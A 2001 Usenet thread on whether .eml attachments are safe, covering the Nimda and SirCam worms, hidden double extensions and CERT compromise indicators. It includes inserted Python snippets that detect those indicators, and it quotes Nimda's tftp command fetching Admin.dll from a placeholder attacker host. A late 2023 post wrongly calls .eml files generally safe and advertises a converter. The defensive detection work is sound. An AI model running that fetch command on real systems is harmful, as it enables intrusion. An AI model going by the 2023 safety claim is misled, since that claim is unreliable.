OT: Are .eml files safe to open?

Bob Chilcoat

Sep 27, 2001, 10:10:49 AM
I don't normally open any .exe file that I get, unless I know who sent it
and what it is. Recently I've been getting a number of .eml files as
attachments, usually attached to e-mails forwarded to me by someone I know.
I also understand that .jpg files that don't open automatically are usually
safe to open since they are interpreted, not executables (is this true?).

Today I got a .eml file that was 570 kbytes long attached to a message. I
assumed that it would contain a binary picture and, since it was from
someone I know and was the subject of the e-mail, I opened it. Instead of a
picture, it turned out to be a simple html message two paragraphs long.
What was the rest of the file? A virus? I have an up-to-date Norton
Antivirus installed, and it has caught a lot of potential trouble, but it
did not alarm on this.

I would appreciate some advice on what attachments are safe to open.

--
Bob

----------

HECTOP

Sep 27, 2001, 10:28:30 AM
In rec.aviation.piloting Bob Chilcoat <view...@erolsremove.com> wrote:
> I don't normally open any .exe file that I get, unless I know who sent it
> and what it is. Recently I've been getting a number of .eml files as


.eml are usually just plain ASCII text files containing e-mail messages complete
with headers usually non-transparent to users, but still they can possibly
(like any other e-mail) contain malicious VBscripts and what not. Your best bet
is to have an anti-virus (with current virus definitions database) check that file,
and/or open that file with a basic text-editor like "notepad" or "wordpad" for example,
something that's not capable of executing any scripts. And as always exercise caution
with any attachments both from known and unknown senders (known sender's machine could
be infected and automatically replicating viruses to anyone in that sender's address book).
One way or another, invest in an anti-virus program that's capable of filtering all
incoming mail for you, Norton Antivirus is one of the most popular choices e.g.

See: http://www.symantec.com/nav/nav_9xnt/


--
--
HECTOP
PP-ASEL-IA
http://www.maxho.com
maxho_at_maxho.com

Arthur Cinader Jr.

Sep 27, 2001, 11:31:26 AM
Bob,

a .eml file is simply an email file. If it is in your inbox or attached to
another .eml file does not change its ability to infect you. If you read
email that you get, you are not opening yourself up to any incremental risk
by reading email attached to other email.

Best,

Arthur

"Bob Chilcoat" <view...@erolsREMOVE.com> wrote in message
news:9ovcd4$av1$1...@bob.news.rcn.net...

Paul Tomblin

Sep 27, 2001, 12:05:29 PM
In a previous article, "Bob Chilcoat" <view...@erolsREMOVE.com> said:
>Today I got a .eml file that was 570 kbytes long attached to a message. I
>assumed that it would contain a binary picture and, since it was from
>someone I know and was the subject of the e-mail, I opened it. Instead of a
>picture, it turned out to be a simple html message two paragraphs long.
>What was the rest of the file? A virus? I have an up-to-date Norton
>Antivirus installed, and it has caught a lot of potential trouble, but it
>did not alarm on this.

Congratulations, you are now infected with the Nimda worm. Right now,
without you knowing it, your machine is busily scanning random IP
addresses and looking to propagate itself by either exploiting one of the
thousands of security holes in Microsoft's IIS web server (which Microsoft
"helpfully" installs on your system without telling you), by opening up
and exploiting hidden file shares, or by attempting to create a TFTP
session and shipping itself over to other computers that way. It will
also attach this readme.eml copy of itself onto every email you send, and
onto every web page your Personal Web Server serves up.

It's no wonder the Gartner Group is recommending that everybody who cares
about security dumps IIS immediately. I'm just amazed that they didn't
say the same thing about IE and Outlook.

--
Paul Tomblin <ptom...@xcski.com>, not speaking for anybody
"I'm cruising down the Information Superhighway in high gear, surfing the
waves of the Digital Ocean, exploring the uncharted regions of Cyberspace.
Actually I'm sitting on my butt staring at a computer screen."

al...@mindhelicalwire.com

Sep 27, 2001, 2:53:24 PM
"Bob Chilcoat" <view...@erolsREMOVE.com> wrote:

>since it was from
>someone I know and was the subject of the e-mail, I opened it.

Bob, watch out for this assumption!!!

I just got an email from my son, with an attached file that he and I
had worked on together a while ago, and a request that I review it. I
didn't notice that it had a different extension (.pif), and opened it,
thus infecting my computer as well. It opened in excel, just like the
original file had. When his question was not obvious to me, I called
him and got an "Oh, shit, I think I've been hit with a virus!" And now
I had it too. In this case it was SirCam, and it cleaned up nicely
with a tool from Norton's web site. And I went off line as soon as we
suspected a virus, so I don't think I infected anyone else.

But the moral is, don't count on knowledge of the sender, or even
knowledge of the attached file to keep you safe, since the email might
have been sent by a virus on your acquaintance's computer.
--
Alex
Make the obvious change in the return address to reply by email.

Bob May

Sep 27, 2001, 3:52:43 PM
Known good extensions are .TXT, .JPG, .GIF for the big ones. There are
others of lesser types like special ones for some particular CAD or other
such type program.
The theory here is that any extension which will be able to contain a
segment of code for any program (like a Word or Office document) can provide
a way for a virus to infect a computer. I don't even like seeing HTML code
in a email as it's also a way to the hard disk through ActiveX controls and
to a slightly lesser degree the scripting controls that are available to the
virus writer.
I also note that others have written about Microsoft's security holes in
their software. Microsoft is the largest pusher of the desire to write to
your hard disk in various ways and, at some point, that will eventually be
their downfall when somebody does a good virus that takes out a large
proportion of the computers that are running windoz.
--
Bob May
Imagine the terrorist's fun when they realize that a "nubile virgin" is a 3
month old girl!


Robert

Sep 27, 2001, 9:00:32 PM
Hummmm ???

I haven't had any real problems to speak of, but just in case, I'm getting
on Microsoft's web page and
updating my security... for what it's worth.

thanks for the heads up

Robert

Marty Escarcega <esca...@home.com> wrote in message
news:20010928002312.CYIV16745.femail46.sdc1.sfba.home.com@cx149251-a...
> Dunno how true it is...but....
> Marty
>
> Found this <9ovio9$igm$1...@allhats.xcski.com> in rec.crafts.metalworking:
>
> == BEGIN forwarded message ==

> == END forwarded message ==
>
>


Thomas Mosher

Sep 27, 2001, 9:29:48 PM
NO NO NO!

At work our firewall went down and, of course, guess what snuck in
immediately after - NIMDA. The .eml files propagated to the point that
multiple computer hard-drives were choked with them.

Ask me - my machine was one of the ones that was screwed beyond belief.

Tom


"Bob Chilcoat" <view...@erolsREMOVE.com> wrote in message
news:9ovcd4$av1$1...@bob.news.rcn.net...

DoN. Nichols

Sep 27, 2001, 11:58:12 PM
In article <9ovcd4$av1$1...@bob.news.rcn.net>,

Bob Chilcoat <view...@erolsREMOVE.com> wrote:
>I don't normally open any .exe file that I get, unless I know who sent it
>and what it is. Recently I've been getting a number of .eml files as
>attachments, usually attached to e-mails forwarded to me by someone I know.
>I also understand that .jpg files that don't open automatically are usually
>safe to open since they are interpreted, not executables (is this true?).

Well ... for the moment -- until MicroSoft comes up with some
way to put executable code in the .jpg. As long as you are *sure* that
it is a .jpg. Do you still have the default setting in your computer to
"hide known extensions"? If so, you could receive a file named
"grandson.jpg.exe", and it would show as "grandson.jpg". Therefore you
might *think* that it is safe to open, but it is not in reality. (This
switch is somewhere in the sub-menus under "My Computer", I think, and
also (on some versions of Windows) has a button "Make others like this"
(or something similar) to cause the selection to take effect on all
directories and disks.)

>Today I got a .eml file that was 570 kbytes long attached to a message. I
>assumed that it would contain a binary picture and, since it was from
>someone I know and was the subject of the e-mail, I opened it.

Don't! Not until you've verified that he *did* intentionally
send it to you, and can tell you why. (Most of) the current viri use
the name of the latest victim, and mail to people in his address files,
so the e-mail will appear to come from someone with whom you exchange
e-mail. One of them (SirCam) grabs a random file out of the "My
Documents" directory, sticks the virus in front of it, and

> Instead of a
>picture, it turned out to be a simple html message two paragraphs long.
>What was the rest of the file? A virus? I have an up-to-date Norton
>Antivirus installed, and it has caught a lot of potential trouble, but it
>did not alarm on this.

How up to date is "up to date"? The general advice now is to
update virus scanner tables daily, not weekly.

>I would appreciate some advice on what attachments are safe to open.

If you want my honest opinion -- with a Windows system, *none*.
Those which are safe today will probably not be so tomorrow.

Now -- MicroSoft has this nasty little habit of creating more
and more extensions, and re-inventing more and more existing standards
in an incompatible way. You used to be able to just forward an e-mail
with no problems. The system took care of the headers and made it all
work properly.

Now -- Microsoft has to create a new attachment for forwarding
e-mail. This is transparent to their programs, but does not work
properly with other programs. Some vendors try to play catchup, opening
similar security holes in their programs.

I stick with unix, with an e-mail program which I can download
in source code form, modify as I wish, compile and install. So I can
make it do what *I* want. It does not attempt to automatically run
attachments. It waits for me to tell it to extract the attachment, and
to tell it where I want to put that attachment. (None of this "put it
in a directory buried somewhere which only the e-mail program knows".)
It also allows me to see the full name, and to edit that name before
saving the file.

Now, a .exe, a .dll, a .scr, or any of the growing number of
other files can be safely saved on a system which has no mechanism to
execute them. I can dig around in the attachments and find out what
virus it is, and what files from the victim's system it has sent out.
(Some very interesting ones from time to time. :-)

So -- *don't* use Outlook Express for an e-mail program. Don't
use a web browser for an e-mail program. (That is vulnerable to some
nasty tricks in HTML -- and the spammers are *using* those nasty tricks.
I see examples frequently.)

Get some third-party program -- Forte Agent, or perhaps Eudora.
Install it, and go through it to turn off any automatic extraction of
attachments, and most of all -- be suspicious of *any* attachment, even
from known friends.

Or -- even better, get some flavor of linux or BSD and use
*that* for handling e-mail. At the moment, they are targeting the
easier target -- Windows.

Now -- if you have Nimda (as was suggested, and as is very
likely), be aware that the CERT advisory about it suggests that the only
way to truly clean the system is to re-format *all* of the hard disks,
and re-install everything from safe media (e.g. the distribution CDs).
Symantec (last I looked at their page on Nimda) seems to feel that they
can clean most of it up, but even they are not sure that they can
restore the system to its proper configuration (e.g. no shares open
which should not be, no backdoors installed, etc.) They *might* have
gotten better at it now, or might not.

Good Luck,
DoN.
--
Email: <dnic...@d-and-d.com> | Voice (all times): (703) 938-4564
(too) near Washington D.C. | http://www.d-and-d.com/dnichols/DoN.html
--- Black Holes are where God is dividing by zero ---
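
Added example, not part of any post in this thread: HECTOP's advice to open an .eml with something that cannot run scripts, and DoN.'s point about hidden double extensions, can be combined by parsing the file as data and listing what each MIME part really is. The sample message, addresses, extension list and flag names are constructed for the example.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage

# File types Windows will run; this list is an assumption of the example, not exhaustive.
RISKY_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".vbs", ".dll"}

def build_sample() -> bytes:
    """Constructed message: a short HTML body plus a padded, misnamed attachment."""
    m = EmailMessage()
    m["From"] = "friend@example.com"
    m["To"] = "you@example.com"
    m["Subject"] = "Fw: picture"
    m.set_content("<p>Two short paragraphs.</p>", subtype="html")
    m.add_attachment(b"MZ" + b"\x00" * 4096, maintype="image",
                     subtype="jpeg", filename="grandson.jpg.exe")
    return m.as_bytes()

def inspect_eml(raw: bytes) -> list:
    """Parse the message as data (nothing is rendered or run) and describe each part."""
    report = []
    for part in message_from_bytes(raw, policy=policy.default).walk():
        if part.is_multipart():
            continue  # containers hold no payload of their own
        name = part.get_filename() or ""
        ctype = part.get_content_type()
        size = len(part.get_payload(decode=True) or b"")
        lower = name.lower()
        ext = "." + lower.rsplit(".", 1)[1] if "." in lower else ""
        flags = []
        if ext in RISKY_EXT:
            flags.append("executable-extension")
            if lower.count(".") >= 2:
                flags.append("double-extension")  # shows as .jpg when extensions are hidden
            if ctype.startswith(("image/", "audio/", "text/")):
                flags.append("type-mismatch")  # declared type disagrees with the name
        report.append({"name": name, "type": ctype, "size": size, "flags": flags})
    return report

if __name__ == "__main__":
    for row in inspect_eml(build_sample()):
        print(f"{row['size']:>8}  {row['type']:<12} {row['name'] or '(body)'}  {row['flags']}")
```

The per-part sizes show where the bulk of a large .eml sits when the visible body is only a couple of paragraphs.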

Bob Chilcoat

Sep 28, 2001, 9:44:31 AM
Thanks, everyone.

Given the very positive statements that I now must HAVE the Nimda worm, I
went back to Norton and downloaded the latest updates (only a few days since
the last time), and then scanned all my disks. This was what Norton
recommended as a "manual" method of cleaning the worm out. NAV found
NOTHING (no viruses of any kind) on any of two hard disks. (I did have NAV
configured for "scan all files".)

OK, is there a way to find out if I have an occult infection that didn't
show up in the scan? Thanks.

For that matter, is there any quick test or file to examine just to see if
NIMDA is present?

--
Bob

----------

"DoN. Nichols" <dnic...@d-and-d.com> wrote in message
news:9p0sgk$59d$1...@izalco.d-and-d.com...

Ed Huntress

Sep 28, 2001, 10:13:00 AM
"Bob Chilcoat" <view...@erolsREMOVE.com> wrote in message
news:9p1v7v$njj$1...@bob.news.rcn.net...

>
> OK, is there a way to find out if I have an occult infection that didn't
> show up in the scan? Thanks.

Here's the recommendation from CERT:
=================================

To determine if your system has been compromised, look for the following:

* a root.exe file (indicates a compromise by Code Red II or sadmind/IIS
worms making the system vulnerable to the Nimda worm)
* an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the
file name Admin.dll may be legitimately installed by IIS in other
directories.)
* unexpected .eml or .nws files in numerous directories
* the presence of this string:
/c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 in the IIS logs,
where "x.x.x.x" is the IP address of the attacking system. (Note that only
the "200" result code indicates success of this command.)
================================

For further info, go to: http://www.cert.org/advisories/CA-2001-26.html

Ed Huntress
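
Added example, not part of the original post or of the CERT advisory: the four checks quoted above, run over saved IIS log lines and a recursive file listing. The sample log lines, the file listing and the `min_dirs` threshold for "numerous directories" are constructed assumptions, and the log format is simplified.

```python
import ntpath
import re

# CERT's log indicator; the attacking address and the result code are captured.
TFTP_RE = re.compile(
    r"/c\+tftp%20-i%20(\d{1,3}(?:\.\d{1,3}){3})%20GET%20Admin\.dll%20\S*Admin\.dll\s+(\d{3})",
    re.IGNORECASE)

# Constructed sample data (documentation-range addresses, simplified log format).
SAMPLE_LOG = [
    r"2001-09-18 14:02:11 192.0.2.44 GET /scripts/root.exe /c+dir 404",
    r"2001-09-18 14:02:13 192.0.2.44 GET /scripts/root.exe /c+tftp%20-i%20192.0.2.44%20GET%20Admin.dll%20d:\Admin.dll 200",
    r"2001-09-18 14:05:40 198.51.100.7 GET /scripts/root.exe /c+tftp%20-i%20198.51.100.7%20GET%20Admin.dll%20c:\Admin.dll 404",
]
SAMPLE_LISTING = [
    r"c:\inetpub\scripts\root.exe",
    r"d:\Admin.dll",
    r"c:\inetpub\wwwroot\Admin.dll",   # not a drive root: may be a legitimate IIS file
    r"c:\temp\readme.eml",
    r"c:\docs\readme.eml",
    r"c:\docs\desktop.eml",
    r"d:\share\readme.nws",
]

def scan_iis_log(lines):
    """One record per line carrying the tftp/Admin.dll request; only 200 means it worked."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = TFTP_RE.search(line)
        if m:
            hits.append({"line": lineno, "source": m.group(1),
                         "succeeded": m.group(2) == "200"})
    return hits

def scan_listing(paths, min_dirs=3):
    """Check a recursive listing (e.g. saved `dir /s /b` output) for the file indicators."""
    root_exe, admin_dll, mail_dirs = [], [], set()
    for p in paths:
        drive, rest = ntpath.splitdrive(p)
        folder, name = ntpath.split(rest)
        low = name.lower()
        if low == "root.exe":
            root_exe.append(p)
        elif low == "admin.dll" and folder == "\\":   # drive root only, per the CERT note
            admin_dll.append(p)
        elif low.endswith((".eml", ".nws")):
            mail_dirs.add((drive + folder).lower())
    return {"root_exe": root_exe, "admin_dll_in_root": admin_dll,
            "mail_file_dirs": len(mail_dirs),
            "mail_files_widespread": len(mail_dirs) >= min_dirs}
```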


Neal Howard

Sep 29, 2001, 12:16:28 AM
With all these Microsoft worms running around the internet, I saw a joke on a
website that said 'MS is contributing to Global Worming '. I thought that was a
pretty good pun.

bit-b...@maney.org

Oct 2, 2001, 1:36:13 PM
[top-posting fixed]

In rec.aviation.piloting Thomas Mosher <tmo...@gbronline.com> wrote:
[...]
: At work our firewall went down and, of course, guess what snuck in
: immediately after - NIMDA.

Hate to say it, but this is a design flaw in your network. If your
firewall is down, then your connection to the Net should be down
as well. Anything else leaves you exposed (as you have already
found out).

: The .eml files propagated to the point that multiple computer
: hard-drives were choked with them.

: Ask me - my machine was one of the ones that was screwed beyond belief.

That's the problem with running insecure machines on insecure networks
(which will become the only type of machine/network if the congress
has their way with regards to strong encryption) they have holes in
them that get exploited.

fpsm
--
| Fredrich P. Maney maney at maney dot org |
| Do NOT send me HTML formatted E-mail or copies of netnews posts! |
| Address in header is a spamtrap. Use one in signature for replies. |
| Please review http://www.maney.org/fred/site/uce/ before emailing. |

Sophia Smith

Nov 26, 2023, 11:24:54 PM
EML files are email message files that contain the content of an email, including the sender, recipient, subject, and message body. They are generally safe to open since they are interpreted files and not executables. You can convert the eml file to PDF for better protection and be cautious when opening email attachments, including .eml files. To safely open an eml file you can use a versatile software that is authorized to convert EML files to PST, MSG, EML, EMLX, MBOX, PDF, CSV, Lotus Notes, Zimbra, Thunderbird, Gmail, Yahoo Mail, Outlook.com, Office 365, Exchange Server, Google Workspace, IMAP, and many more.

To Convert- https://www.mailsware.com/eml-converter.html